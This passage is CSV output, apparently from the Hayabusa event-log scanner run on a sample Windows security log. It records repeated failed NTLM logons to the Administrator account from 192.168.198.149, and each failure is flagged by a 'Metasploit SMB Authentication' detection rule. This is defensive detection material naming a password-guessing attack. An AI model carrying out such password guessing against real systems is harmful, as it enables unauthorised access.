Password,User: Administrator : Type: 3 : Workstation: pprfGGVZblL64xC3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.074 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wxgzMKd7eDwzs8WO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q2RljqAhn0NZhR6O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcxQVtjMqnE1wGfr : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.268 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fSRggYsSiJGsGSyV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.321 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yQqfSKOyKLSILPrQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.374 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7oAI2q6YCu8btlK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.552 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KniVwndqE9aC6cIM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FgQbvpfuS11matJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R9TwJS4B9ZaDD2Ze : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IPUuoopOnwlTjlTP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9VEyOUuiOi8Q3JBJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGGGazMTBBfrppDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NKO4V35Y2qPEB59W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.919 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WxVdhpR7ZnAluurU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:53.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZjAZb9bQKZjwL8u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aKyLX5ChpgBuFEbr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.066 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49t2xJvH2yHcyHle : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sg9Z6Pyix2UkMolr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0NN2olYn97ZoYCja : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.210 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: S98j54bDGsz0k6g9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.249 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxFEw9s0nnEQGzUN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.284 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSswFHFSlqcQd47k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7icutlVIWSLZJszQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DSwyugYn0n3i5f25 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.440 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RmBaLCUcR7TmixTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1oOBz2NQSCdTwa7V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O4tU1LPF5DRW9Vm0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRsSNqPYruWBzp2n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3JZhBLzt4af1VtCU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: dFLZIKSDBvBaWq59 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: guAG4ZTFMjZAxp1A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Yd04xsSIdiczICeG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cx3i1URKPhC6KWI7 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.865 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Npc6IS27HsWP3JA9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.914 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIBnr0eZ1bHHGokW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:54.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6gTTrUVjpPU80LlC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.013 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
